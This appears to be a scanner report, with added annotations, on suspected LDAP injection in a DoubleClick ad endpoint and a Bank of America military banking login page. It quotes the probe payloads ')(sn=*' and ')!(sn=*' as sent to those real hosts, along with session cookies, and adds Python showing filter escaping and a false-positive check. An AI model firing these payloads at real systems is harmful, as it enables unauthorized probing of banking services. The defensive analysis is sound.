                               <div class="ProductDetails">
                                   <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong>
                               </div>
                               <div class="ProductPriceRating">
                                   <em><strike>$129.95</strike> $94.95</em>
                                   <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span>
                               </div>
                               <div class="ProductCompareButton" style="display:none">
                                   <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br />
                               </div>
                               <div class="ProductActionAdd" style="display:;">
                                   <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&amp;product_id=2">Add To Cart</a>
                               </div>
                           </li>                            <li class="Even">
                               <div class="ProductImage">
                                   <a
...[SNIP]...

2. LDAP injection
There are 9 instances of this issue:


2.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [client parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Issue detail

The client parameter appears to be vulnerable to LDAP injection attacks.

The payloads 4c58e894af09d5bd)(sn=* and 4c58e894af09d5bd)!(sn=* were each submitted in the client parameter. The two requests produced different responses, which the scanner interprets as the input possibly being incorporated into a disjunctive LDAP query in an unsafe manner. In a filter built by concatenation the first payload yields a syntactically valid filter while the second leaves a stray ! that the filter parser rejects, so a real injection point should handle the two differently.

Difference-based LDAP tests are as prone to false positives as the SQL ones above. In the responses below the payload is reflected unchanged into the click-through href, and the only other difference is the creative served (Frame_Rev_728x90.gif versus Surprise_728x90_Free2011Score.gif) with a different click path for the same TransUnion landing page, which is what ad rotation produces on any two requests. Treat this as unconfirmed unless repeated unmodified requests are stable and the two payloads diverge consistently.
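Added example, not part of the report: how the two payloads from this finding would land in an LDAP search filter if the client parameter were concatenated into one, and the RFC 4515 escaping that keeps them inert. The filter template (the client id inside an OR filter with an objectClass term) is an assumption made for the example; nothing on the page shows how the ad server handles the value.

```python
# Added example (not part of the XSS.CX / Burp report): how the two payloads
# from this finding would land in an LDAP search filter if the client
# parameter were concatenated into one, and the RFC 4515 escaping that keeps
# them inert. The filter template (client id inside an OR filter) is an
# assumption; nothing on the page shows how the ad server handles the value.

# RFC 4515 section 3: characters that must be escaped inside an assertion value.
ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}


def ldap_escape(value: str) -> str:
    """Escape an assertion value; backslash goes first so the escapes it
    produces are not escaped again."""
    out = value.replace("\\", ESCAPES["\\"])
    for ch in "*()\0":
        out = out.replace(ch, ESCAPES[ch])
    return out


def build_filter(client: str, escape: bool) -> str:
    """Assumed backend template: OR of the client id and an object class."""
    value = ldap_escape(client) if escape else client
    return "(|(client=" + value + ")(objectClass=adClient))"


def top_level_items(filt: str) -> list:
    """Split '(|item1item2...)' into its items. Raises ValueError on stray
    characters between items or unbalanced parentheses (a minimal checker,
    enough to tell a well-formed filter from a broken one)."""
    if filt[:2] not in ("(&", "(|") or not filt.endswith(")"):
        raise ValueError("not an AND/OR filter")
    inner = filt[2:-1]
    items, depth, start = [], 0, 0
    for i, ch in enumerate(inner):
        if ch == "(":
            if depth == 0:
                start = i
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                raise ValueError("unbalanced ')'")
            if depth == 0:
                items.append(inner[start:i + 1])
        elif depth == 0:
            raise ValueError("stray %r outside an item" % ch)
    if depth != 0:
        raise ValueError("unbalanced '('")
    return items


def classify(client: str, escape: bool) -> tuple:
    """('valid', item count) or ('malformed', 0) for the resulting filter."""
    filt = build_filter(client, escape)
    try:
        return ("valid", len(top_level_items(filt)))
    except ValueError:
        return ("malformed", 0)


if __name__ == "__main__":
    for payload in ("4c58e894af09d5bd)(sn=*", "4c58e894af09d5bd)!(sn=*"):
        print(repr(payload), "raw:", classify(payload, False),
              "escaped:", classify(payload, True))
```

Unescaped, the first payload adds a third (sn=*) term to the filter and the second produces a filter the parser rejects; escaped, both stay inside the client= value and the filter keeps its two terms, which is the behaviour an application should show for any input.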

Request 1

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=4c58e894af09d5bd)(sn=*&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:38:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 821

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/1ea/%2a/u;228460640;0-0;0;50161665;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=4c58e894af09d5bd)(sn=*&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>

Request 2

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=4c58e894af09d5bd)!(sn=*&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:38:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 835

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/1eb/%2a/k;228460640;1-0;0;50161665;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=4c58e894af09d5bd)!(sn=*&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>

2.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [num parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Issue detail

The num parameter appears to be vulnerable to LDAP injection attacks.

The payloads 3beb1e7094e1a2ad)(sn=* and 3beb1e7094e1a2ad)!(sn=* were each submitted in the num parameter. The two requests produced different responses, which the scanner reads as a sign that the input may be incorporated unsafely into a disjunctive LDAP query. The responses captured below differ only in the creative served (Frame_Rev_728x90.gif against Surprise_728x90_Free2011Score.gif) and in the click-tracking identifiers; the same two creatives alternate in the request pair for 2.1 above, so the difference is consistent with ordinary ad rotation rather than with the payload, and the Tentative confidence should be read in that light.
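The scanner's heuristic is purely differential: it never sees an LDAP filter, only two responses. The following is an added example, not part of the report and not code from any of the scanned hosts, in Python. It shows what the two probes do to a filter built by string concatenation (the first yields a syntactically valid filter with an extra always-true assertion, the second a malformed one, which is why a real LDAP back end answers them differently), how RFC 4515 escaping neutralises both, and the baseline check a practitioner adds before believing a differential result: replay the unmodified request, strip per-request headers such as Date and Set-Cookie, and only then compare. The filter template, the uid values, the cookie names and the sample responses are constructed for the example.

```python
"""LDAP filter injection probes, RFC 4515 escaping and a noise-aware
differential check.

Added example: the filter template, user names and sample HTTP
responses below are constructed for illustration and are not taken
from the scanned hosts or from the report.
"""
from __future__ import annotations

import re

# RFC 4515 section 3: inside an assertion value these characters must be
# written as a backslash followed by two hex digits.
_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape a string for use as an LDAP assertion value (RFC 4515)."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(uid: str) -> str:
    """Vulnerable pattern: the input is concatenated straight into the filter."""
    return f"(&(uid={uid})(objectClass=person))"


def build_filter_safe(uid: str) -> str:
    """Same filter with the value escaped; the metacharacters become literals."""
    return f"(&(uid={escape_filter_value(uid)})(objectClass=person))"


def probe_pair(marker: str) -> tuple[str, str]:
    """The two probes the report describes: MARKER)(sn=* and MARKER)!(sn=*.

    Inside (&(uid=...)(objectClass=person)) the first closes the uid
    assertion and adds (sn=*), a valid filter that matches every entry
    with a surname; the second leaves a stray '!' and does not parse.
    """
    return f"{marker})(sn=*", f"{marker})!(sn=*"


# Headers that legitimately differ between two otherwise identical requests
# (timestamps, freshly minted cookies).  Dropping them before comparing stops
# a per-request tracking cookie from registering as a payload-driven change.
_VOLATILE_HEADER = re.compile(r"^(Date|Expires|Set-Cookie):[^\n]*\n", re.MULTILINE)


def normalise(response: str) -> str:
    """Strip volatile headers so only payload-dependent content is compared."""
    return _VOLATILE_HEADER.sub("", response)


def differential_verdict(baselines: list[str], resp_a: str, resp_b: str) -> str:
    """Model of the scanner's heuristic, plus the baseline check it omits.

    The scanner flags the parameter when the two probe responses differ.
    Before trusting that, replay the unmodified request several times:
    if those baselines already differ from one another (ad rotation,
    A/B buckets, rotating page titles), a probe difference proves nothing.
    """
    if len({normalise(b) for b in baselines}) > 1:
        return "inconclusive: baseline varies without any payload"
    if normalise(resp_a) == normalise(resp_b):
        return "no payload-dependent difference"
    return "responses differ: inspect the filter or query behind the parameter"


# Constructed sample: a tracking pixel whose only per-request change is a
# freshly issued cookie, modelled on the shape of a 1x1 GIF beacon response.
PIXEL_A = (
    "HTTP/1.1 200 OK\n"
    "Date: Tue, 26 Apr 2011 12:26:54 GMT\n"
    "Set-Cookie: 90010394_login=1303820814016783873090010394; path=/\n"
    "Content-Type: image/gif\n"
    "\n"
    "GIF89a"
)
PIXEL_B = PIXEL_A.replace("1303820814016783873090010394", "1303820814018461594690010394")

# Constructed sample: an ad slot that alternates creatives on its own.
AD_FRAME = '<img src="/creative/frame_728x90.gif">'
AD_SURPRISE = '<img src="/creative/surprise_728x90.gif">'


if __name__ == "__main__":
    p_valid, p_invalid = probe_pair("3beb1e7094e1a2ad")
    print(build_filter_unsafe(p_valid))    # extra (sn=*) assertion injected
    print(build_filter_unsafe(p_invalid))  # malformed filter, server error
    print(build_filter_safe(p_valid))      # same probe rendered harmless
    print(differential_verdict([PIXEL_A, PIXEL_A], PIXEL_A, PIXEL_B))
    print(differential_verdict([AD_FRAME, AD_SURPRISE], AD_FRAME, AD_SURPRISE))
```

Run stand-alone it prints the three filters and two verdicts. The pixel pair comes back as no payload-dependent difference once the rotating cookie is ignored, and the ad pair comes back inconclusive because the baseline itself alternates; those are the two situations the captures in this report fall into, and neither would survive the extra check.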

Request 1

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=3beb1e7094e1a2ad)(sn=*&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:36:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 843

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/200/%2a/u;228460640;0-0;0;50161665;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=3beb1e7094e1a2ad)(sn=*&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>

Request 2

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=3beb1e7094e1a2ad)!(sn=*&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:36:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 857

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/201/%2a/k;228460640;1-0;0;50161665;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=3beb1e7094e1a2ad)!(sn=*&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>

2.3. https://militarybankonline.bankofamerica.com/efs/servlet/military/login-wait.jsp [TCID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://militarybankonline.bankofamerica.com
Path:   /efs/servlet/military/login-wait.jsp

Issue detail

The TCID cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the TCID cookie. The two requests produced different responses, which the scanner reads as a sign that the input may be incorporated unsafely into a conjunctive LDAP query. In the captures below the responses differ in the page title only ("Sorry", 9016 bytes, against "Reset Password Wait", 9030 bytes); both carry the same "Please Wait..." body and the same redirect to /efs/servlet/military/DetectDemoMode. The same two titles appear in the opposite order for the ngen_throttle cookie in 2.4 below, so the variation is not shown to depend on the payload.

Request 1

GET /efs/servlet/military/login-wait.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000HPVCjNCdRvjHV0dGZx6wnu9:13393tt7e; TCID=*)(sn=*; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:40 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9016


<!-- login-wait.jsp -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/efs/servl
...[SNIP]...
<h1 class="pageTitle">Sorry</h1><a name="skipnav"></a></td>
       <td align="right" class="nav3" valign="top">
       </td>
       <td><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=""></td>
   </tr>
   <tr>
       <td colspan="4"><img src="/efs/grafx/spacer.gif" alt="" width="1" height="4"></td>
   </tr>
   <tr>
       <td width="1%"><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=" "></td>
       <td colspan="3" class="rule-blue1" ><img src="/efs/grafx/spacer.gif" alt="" width="1" height="1"></td>
   </tr>

</table>
<div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div>
<!-- end nav 3 -->


<!-- BEGIN CONTENT AREA -->
<div id="content" >
   
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->


<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->

<span class="mainfontbold">Please Wait...</span>


<script language="JavaScript" type="text/javascript">
function setLocation() {
location.replace("/efs/servlet/military/DetectDemoMode");
}
window.onload=setLocation
</script>

</div>
<!-- END CONTENT AREA -->


<!-- minimum 70 pixels below content well -->
<div><img src="/efs/grafx/spacer.gif" alt="" width="1" height="70"></div>

<!-- blue rule with vertical spacing -->
<div style="margin-left: 12px;"><img src="/efs/grafx/rule-blue-735px.gif" alt="" width="735" height="1"></div>
<
...[SNIP]...

Request 2

GET /efs/servlet/military/login-wait.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000HPVCjNCdRvjHV0dGZx6wnu9:13393tt7e; TCID=*)!(sn=*; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:40 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9030


<!-- login-wait.jsp -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/efs/servl
